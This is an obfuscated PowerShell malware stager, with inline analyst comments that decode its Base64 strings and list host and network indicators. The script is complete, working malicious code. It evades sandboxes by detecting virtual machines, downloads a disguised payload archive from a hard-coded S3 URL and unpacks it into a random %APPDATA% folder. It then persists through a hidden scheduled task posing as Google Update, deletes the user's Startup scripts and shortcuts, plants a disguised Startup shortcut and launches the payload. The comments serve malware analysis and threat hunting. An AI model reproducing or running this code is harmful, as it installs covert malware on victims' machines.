JohnGalt14

st3.ps1 ISESteroids obfuscation

Jan 26th, 2019
  # Obfuscated configuration block: every literal below is Base64 of a UTF-16LE string
  # (ISESteroids-style obfuscation). Decoded values:
  #   ${/=\_/\/===\_____/}  -> "https://s3-sa-east-1.amazonaws.com/alulas2019/XkbyCQnAjfbrOx.bmp"
  #                            download URL (network indicator); despite the ".bmp" extension the body
  #                            is later renamed to .zip and unpacked with Shell.Application
  #   ${/=\/=\/\/===\/===}  -> "nvsmartmaxapp.exe"  (payload launched at the end of the script)
  #   ${/=\/\/\_/=\___/==}  -> "nvsmartmaxapp"      (base name of the Startup-folder .lnk)
  #   ${___/\/\/\__/=\/=\}  -> "gup.exe"            (binary registered as the scheduled-task action)
  ${/=\_/\/===\_____/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAHMAMwAtAHMAYQAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvAGEAbAB1AGwAYQBzADIAMAAxADkALwBYAGsAYgB5AEMAUQBuAEEAagBmAGIAcgBPAHgALgBiAG0AcAA=')))
  ${/=\/=\/\/===\/===} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgB2AHMAbQBhAHIAdABtAGEAeABhAHAAcAAuAGUAeABlAA==')))
  ${/=\/\/\_/=\___/==}    = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgB2AHMAbQBhAHIAdABtAGEAeABhAHAAcAA=')))
  ${___/\/\/\__/=\/=\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZwB1AHAALgBlAHgAZQA=')))
  # Persistence: registers a scheduled task through the Task Scheduler COM API ("Schedule.Service").
  # Parameters:
  #   ${__/\_/=\/\_/===\_/} - full path of the executable the task runs (Action.Path)
  #   ${_/=\/==\_____/=\_/} - working directory for the action
  # The task masquerades as a Google component: name "GoogleBol", Author "Google Update",
  # Description (Portuguese) "Mantém o seu software do Google atualizado." = "Keeps your Google software up to date."
  # Trigger: daily (Triggers.Create(2) = TASK_TRIGGER_DAILY), StartBoundary one minute after registration,
  # repeating every three hours ("PT3H"). Action: Actions.Create(0) = TASK_ACTION_EXEC, Arguments "gup.exe".
  # RegisterTaskDefinition(name, task, 6 = TASK_CREATE_OR_UPDATE, $null, $null, 3 = TASK_LOGON_INTERACTIVE_TOKEN).
  # Defensive note: a hidden task whose Author/Description claim to be Google but whose action path is under
  # %APPDATA% is a good hunting query (Task Scheduler operational log, task XML review).
  function ___/\____/=\/\/==\(${__/\_/=\/\_/===\_/} , ${_/=\/==\_____/=\_/})
    {
      ${/===\____/=\/=\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAG8AZwBsAGUAQgBvAGwA')))  # "GoogleBol" - task name
      ${__/===\/\_/\__/=\} = ${__/\_/=\/\_/===\_/}  # executable path; read back below through ExpandString
      ${_____/\_/\/\_/=\_} = ""  # assigned but never used in this function
      ${_/=\/\/=\/\___/=\}= ${_/=\/==\_____/=\_/}  # working directory
      ${__/==\_____/\/==\} = [datetime]::Now.AddMinutes(1)  # first run one minute from now
      ${/=\/\_/==\/\____/} = new-object -ComObject($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAC4AUwBlAHIAdgBpAGMAZQA='))))  # "Schedule.Service"
      ${/=\/\_/==\/\____/}.Connect()
      ${_/\/=\/\_/\/==\/\} = ${/=\/\_/==\/\____/}.GetFolder("\")  # root task folder
      ${___/=\__/==\_/\_/} = ${/=\/\_/==\/\____/}.NewTask(0)
      ${_/\_/==\_/=\/=\__} = ${___/=\__/==\_/\_/}.RegistrationInfo
      ${_/\_/==\_/=\/=\__}.Description = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAG4AdADpAG0AIABvACAAcwBlAHUAIABzAG8AZgB0AHcAYQByAGUAIABkAG8AIABHAG8AbwBnAGwAZQAgAGEAdAB1AGEAbABpAHoAYQBkAG8ALgA=')))  # "Mantém o seu software do Google atualizado."
      ${_/\_/==\_/=\/=\__}.Author = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAG8AZwBsAGUAIABVAHAAZABhAHQAZQA=')))  # "Google Update"
      ${/=\/==\/=====\/\/} = ${___/=\__/==\_/\_/}.Settings
      ${/=\/==\/=====\/\/}.Enabled = $true
      ${/=\/==\/=====\/\/}.StartWhenAvailable = $true
      ${/=\/==\/=====\/\/}.AllowDemandStart = $true
      ${/=\/==\/=====\/\/}.Hidden = $true  # hidden from the default Task Scheduler view
      ${__/\_/==\_/\_/=\/} = ${___/=\__/==\_/\_/}.Triggers  
      ${___/\/==\/\/\/=\/} = ${__/\_/==\_/\_/=\/}.Create(2)  # TASK_TRIGGER_DAILY
      ${___/\/==\/\/\/=\/}.StartBoundary = ${__/==\_____/\/==\}.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('eQB5AHkAeQAtAE0ATQAtAGQAZAAnAFQAJwBIAEgAOgBtAG0AOgBzAHMA'))))  # format "yyyy-MM-dd'T'HH:mm:ss"
      ${___/\/==\/\/\/=\/}.Repetition.Interval = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABUADMASAA=')))  # "PT3H" - repeat every 3 hours
      ${___/\/==\/\/\/=\/}.Enabled = $true
      ${/==\___/=\/=\__/\} = ${___/=\__/==\_/\_/}.Actions.Create(0)  # TASK_ACTION_EXEC
      ${/==\___/=\/=\__/\}.Path = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AFwALwBcAF8ALwBcAF8AXwAvAD0AXAB9AA==')))  # expands "${__/===\/\_/\__/=\}" -> the executable path parameter
      ${/==\___/=\/=\__/\}.Arguments = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAFwAXwAvAFwALwBcAF8ALwA9AFwAXwB9AA==')))  # expands "${___/\/\/\__/=\/=\}" -> "gup.exe"
      ${/==\___/=\/=\__/\}.WorkingDirectory = ${_/=\/\/=\/\___/=\}      
      ${_/\/=\/\_/\/==\/\}.RegisterTaskDefinition($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQA9AD0AXABfAF8AXwBfAC8APQBcAC8APQBcAF8ALwB9AA=='))),${___/=\__/==\_/\_/},6,$null,$null,3) | Out-Null    # name expands to "GoogleBol"; 6 = create-or-update, 3 = interactive token
    }
  # Anti-analysis check: reads Win32_ComputerSystem.Model via WMI and compares it with common
  # virtualization model strings. Returns "Y" when the host looks like a VM (the main body only runs on "N").
  # Decoded comparison values: "VirtualBox", "VMware Virtual Platform", "Virtual Machine" (Hyper-V),
  # "HVM domU" (Xen). No parameters.
  # Defensive note: this is why the sample may appear inert in a default VM-based sandbox; analysis hosts
  # that spoof the WMI model string (or static decoding of the strings) avoid the gate.
  function _/==\/\/=\___/=\_/
  {
    ${_/\__/\__/\__/\/=} = Get-WmiObject -Class Win32_ComputerSystem |Select-Object -ExpandProperty Model
    if (${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or
      ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or
      ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or
    ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA=='))))
    {
      return "Y"
    }
    else
    {
      return "N"
    }
  }
  # Generates a short random alphanumeric name, used for the dropped file and the install folder.
  # Alphabet (decoded): "qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM".
  # Get-Random's -Maximum is exclusive, so the count is 1..8 and the 0..count loop yields 2 to 9 characters;
  # likewise the index starts at 1, so the first alphabet character ('q') is never picked.
  # No parameters. The try/finally{} wrapper has no catch, so errors propagate to the caller.
  function ______/\_/\_/=\/\_
  {
    try
    {
      ${/=\/\/=\_/==\__/\} = Get-Random -Minimum 1 -Maximum 9  # 1..8
      ${__/\__/\/=\/=\/\_} = ""
      For (${_/\/===\/==\__/\/}=0; ${_/\/===\/==\__/\/} -le ${/=\/\/=\_/==\__/\}; ${_/\/===\/==\__/\/}++)
      {
        ${_/=\/=\__/=\_/\__}  = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA=')))  # alphabet (re-decoded every iteration)
        ${_/\___/\/=\_/\/\/}  = Get-Random -Minimum 1 -Maximum ${_/=\/=\__/=\_/\__}.Length  # 1..Length-1
        ${__/\_/\_/\_/===\/} = ${_/=\/=\__/=\_/\__}.Substring(${_/\___/\/=\_/\/\/},1)
        ${__/\__/\/=\/=\/\_} = ${__/\__/\/=\/=\/\_}+${__/\_/\_/\_/===\/}  
      }
      return ${__/\__/\/=\/=\/\_}
    }
    finally{}
  }
  # Downloader: fetches a URL with HttpWebRequest and writes the body to a file.
  # Parameters:
  #   ${_/=\___/=\_/\___/\} - URL string (wrapped in a System.Uri; decoded type name "System.Uri")
  #   ${_/=\/\/\_/\/======} - destination file path (opened with FileMode.Create, i.e. truncated)
  # Returns "Y" unconditionally. No try/catch: timeouts (15 s) or HTTP errors propagate to the caller.
  # The content length in KB and the running byte total are computed but never used; only the
  # response stream is disposed, the WebResponse object itself is not closed.
  function __/=\/\/\_/=\_/\__(${_/=\___/=\_/\___/\}, ${_/=\/\/\_/\/======})
  {
      ${/=\______/====\__} = New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBVAHIAaQA='))) $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwA9AFwAXwBfAF8ALwA9AFwAXwAvAFwAXwBfAF8ALwBcAH0A')))  # "System.Uri" of "${_/=\___/=\_/\___/\}" (the URL parameter)
      ${__/\/==\_/=\/\/=\} = [System.Net.HttpWebRequest]::Create(${/=\______/====\__})
      ${__/\/==\_/=\/\/=\}.set_Timeout(15000)  # 15 second timeout
      ${/=\__/=\__/\___/=} = ${__/\/==\_/=\/\/=\}.GetResponse()
      ${_/\/=\____/\_/=\_} = [System.Math]::Floor(${/=\__/=\__/\___/=}.get_ContentLength()/1024)  # size in KB, unused
      ${__/\/=\/\__/\_/\/} = ${/=\__/=\__/\___/=}.GetResponseStream()
      ${___/==\/\/\/\____} = New-Object -TypeName System.IO.FileStream -ArgumentList ${_/=\/\/\_/\/======}, Create
      ${_/\_/==\_/\/\/\__} = new-object byte[] 10KB  # copy buffer
      ${/=\/==\__/\/=\/==} = ${__/\/=\/\__/\_/\/}.Read(${_/\_/==\_/\/\/\__},0,${_/\_/==\_/\/\/\__}.length)
      ${/=\_/\_/=\/\___/=} = ${/=\/==\__/\/=\/==}  # running total of bytes read, unused
      while (${/=\/==\__/\/=\/==} -gt 0)
      {
          ${___/==\/\/\/\____}.Write(${_/\_/==\_/\/\/\__}, 0, ${/=\/==\__/\/=\/==})
          ${/=\/==\__/\/=\/==} = ${__/\/=\/\__/\_/\/}.Read(${_/\_/==\_/\/\/\__},0,${_/\_/==\_/\/\/\__}.length)
          ${/=\_/\_/=\/\___/=} = ${/=\_/\_/=\/\___/=} + ${/=\/==\__/\/=\/==}
      }
      ${___/==\/\/\/\____}.Flush()
      ${___/==\/\/\/\____}.Close()
      ${___/==\/\/\/\____}.Dispose()
      ${__/\/=\/\__/\_/\/}.Dispose()
      return "Y"
  }
  # Startup persistence: writes a .lnk shortcut with WScript.Shell.
  # Parameters (via Param block):
  #   ${___/\_/==\_/===\_/} - path of the shortcut file to create
  #   ${_/=\/==\/=\_/==\__} - target executable (TargetPath; decoded expansion "${_/=\/==\/=\_/==\__}")
  # WorkingDirectory expands to "$env:APPDATA\${___/\_/\_/\/\_/=\}", i.e. the random install folder
  # variable set by the main body (read through PowerShell's parent-scope lookup).
  # WindowStyle 7 = minimized/inactive; IconLocation "%ProgramFiles%\Internet Explorer\iexplore.exe,1"
  # so the shortcut carries an Internet Explorer icon. try{}finally{} has no catch, errors propagate.
  function __/====\/\_____/\_
  {
    Param([string]${___/\_/==\_/===\_/},[string]${_/=\/==\/=\_/==\__});
    try{  
      ${/\______/==\__/=\} = New-Object -ComObject WScript.Shell
      ${/=\/\/\/\__/\/===} = ${/\______/==\__/=\}.CreateShortcut(${___/\_/==\_/===\_/})
      ${/=\/\/\/\__/\/===}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwA9AFwALwA9AD0AXAAvAD0AXABfAC8APQA9AFwAXwBfAH0A')))  # -> second parameter (target exe)
      ${/=\/\/\/\__/\/===}.Arguments = ""
      ${/=\/\/\/\__/\/===}.WorkingDirectory = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwBfAF8ALwBcAF8ALwBcAF8ALwBcAC8AXABfAC8APQBcAH0A')))  # -> %APPDATA%\<random install folder>
      ${/=\/\/\/\__/\/===}.WindowStyle = 7  # minimized, no focus
      ${/=\/\/\/\__/\/===}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))  # "%ProgramFiles%\Internet Explorer\iexplore.exe,1"
      ${/=\/\/\/\__/\/===}.Save()
    }finally{}
  }
  # Single-instance gate: opens/creates the named mutex "444444444444" (decoded) and calls WaitOne()
  # with no timeout, which blocks until the mutex is acquired and then returns $true.
  # The mutex is never released, so it stays held for the lifetime of the process.
  # Defensive note: the fixed mutex name is a host-based indicator.
  function __/\__/==\/\__/=\/
  {
    try
    {
      ${___/=\____/\_/=\/} = New-Object System.Threading.Mutex($false, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NAA0ADQANAA0ADQANAA0ADQANAA0ADQA'))))  # name "444444444444"
      return ${___/=\____/\_/=\/}.WaitOne()  
    }finally{}
  }
  # Main body. Runs only when the VM check returned "N" and the "444444444444" mutex was acquired.
  # Flow: kill wmplayer -> download the S3 object to %APPDATA%\<rand1>.txt, retrying every second until the
  # file exceeds 2048KB -> rename it to .zip and unpack into %APPDATA%\<rand2>\ with Shell.Application ->
  # register the "GoogleBol" scheduled task for <rand2>\gup.exe -> delete *.vbs and *.lnk from the user's
  # Startup folder -> drop Startup\nvsmartmaxapp.lnk pointing at <rand2>\nvsmartmaxapp.exe -> launch it.
  # Defensive note: nothing here is wrapped in try/catch, so a blocked download or missing COM object ends the
  # script with an error; the random-named %APPDATA% folder, the Startup .lnk, the task, the mutex and the
  # S3 URL are the artifacts to hunt for.
    if (_/==\/\/=\___/=\_/ -eq "N")  # not VirtualBox / VMware / Hyper-V / Xen
    {
      if (__/\__/==\/\__/=\/)  # named-mutex single-instance gate
      {    
        stop-process -name wmplayer  # terminates Windows Media Player; reason not evident from the script
        ${_/\/====\___/==\_} = ${env:APPDATA}+"\"
        ${/==\_/\______/\/\} = ______/\_/\_/=\/\_  # rand1: base name of the downloaded file
        ${___/\_/\_/\/\_/=\} = ______/\_/\_/=\/\_  # rand2: install folder name (also read by the shortcut function)
        ${/=\_____/=\____/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB0AHgAdAA=')))  # ".txt"
        ${/======\_/\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB2AGIAcwA=')))  # ".vbs" - assigned, never used
        ${___/\/\_/=\/\/==\}  = ${_/\/====\___/==\_}+${/==\_/\______/\/\}+${/=\_____/=\____/\}  # %APPDATA%\<rand1>.txt
        ${/=\__/=\/===\/==\} = new-object -ComObject scripting.filesystemobject
        ${/=\__/=\/===\/==\}.CreateFolder(${_/\/====\___/==\_}+${___/\_/\_/\/\_/=\})  | Out-Null  # %APPDATA%\<rand2>
        sleep -s 1
        ${_/\/\__/=\__/\/=\}  = $false
        while(${_/\/\__/=\__/\/=\} -ne $true)  # re-download until the file is larger than 2048KB
          {
          __/=\/\/\_/=\_/\__ ${/=\_/\/===\_____/} ${___/\/\_/=\/\/==\}; sleep -s 1  # download(URL, %APPDATA%\<rand1>.txt)
          if ((Get-Item ${___/\/\_/=\/\/==\}).length -gt 2048kb)
           {
             ${_/\/\__/=\__/\/=\}  = $true                                                          
             ${/=\_/=\/===\____/} =  "Y"
            }
            else
             {                    
              ${/=\_/=\/===\____/} = "N"
             }
          Write-Host ${_/\/\__/=\__/\/=\}
          }  
         ${/=\_/=\/===\____/} =  "Y"  # set unconditionally, so the branch below always runs
          if (${/=\_/=\/===\____/} -eq "Y")
          {
            ${_/\__/\/===\_/==\} = ${_/\/====\___/==\_}+${/==\_/\______/\/\} +$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA=')))  # %APPDATA%\<rand1>.zip
            Rename-Item -Path $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAC8AXAAvAFwAXwAvAD0AXAAvAFwALwA9AD0AXAB9AA=='))) -NewName $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwBcAF8AXwAvAFwALwA9AD0APQBcAF8ALwA9AD0AXAB9AA==')));  # <rand1>.txt -> <rand1>.zip
            ${_/\_/\______/=\__} = New-Object -ComObject shell.application
            ${_/\__/\/=\/===\__} = ${_/\_/\______/=\__}.NameSpace(${_/\__/\/===\_/==\})  # open the zip as a shell folder
            foreach (${___/=\/==\_/==\_/} in ${_/\__/\/=\/===\__}.items())
            {            
              ${_/\_/\______/=\__}.Namespace(${_/\/====\___/==\_}+${___/\_/\_/\/\_/=\}).CopyHere(${___/=\/==\_/==\_/}, 0x14)  # extract into <rand2>; 0x14 = FOF_NOCONFIRMATION | FOF_SILENT
            }                        
            sleep -s 3
            del ${_/\__/\/===\_/==\}  # remove the zip
            ___/\____/=\/\/==\ -__/\_/=\/\_/===\_/ $env:APPDATA\${___/\_/\_/\/\_/=\}\${___/\/\/\__/=\/=\} -_/=\/==\_____/=\_/ $env:APPDATA\${___/\_/\_/\/\_/=\}  # task "GoogleBol" -> <rand2>\gup.exe
            ${_/\__/\/\___/\__/} = New-Object -Com WScript.Shell
            ${/=\___/=\_/==\/=\} = ${_/\__/\/\___/\__/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));  # "startup" - the user's Startup folder
            del ${/=\___/=\_/==\/=\}\*.vbs  # wipes existing Startup scripts and shortcuts
            del ${/=\___/=\_/==\/=\}\*.lnk      
            ${____/===\/=\_____} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwBfAF8ALwBcAF8ALwBcAF8ALwBcAC8AXABfAC8APQBcAH0AXAAkAHsALwA9AFwALwA9AFwALwBcAC8APQA9AD0AXAAvAD0APQA9AH0A')))  # %APPDATA%\<rand2>\nvsmartmaxapp.exe
            ${_/\_____/=\/=\__/} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQBcAF8AXwBfAC8APQBcAF8ALwA9AD0AXAAvAD0AXAB9AFwAJAB7AC8APQBcAC8AXAAvAFwAXwAvAD0AXABfAF8AXwAvAD0APQB9AC4AbABuAGsA')))  # <Startup>\nvsmartmaxapp.lnk
            __/====\/\_____/\_ ${_/\_____/=\/=\__/}  ${____/===\/=\_____};  # create the Startup shortcut
            cd $env:APPDATA\${___/\_/\_/\/\_/=\}; Start-Process $env:APPDATA\${___/\_/\_/\/\_/=\}\${/=\/=\/\/===\/===};  # launch nvsmartmaxapp.exe from <rand2>
          }    
      }        
    }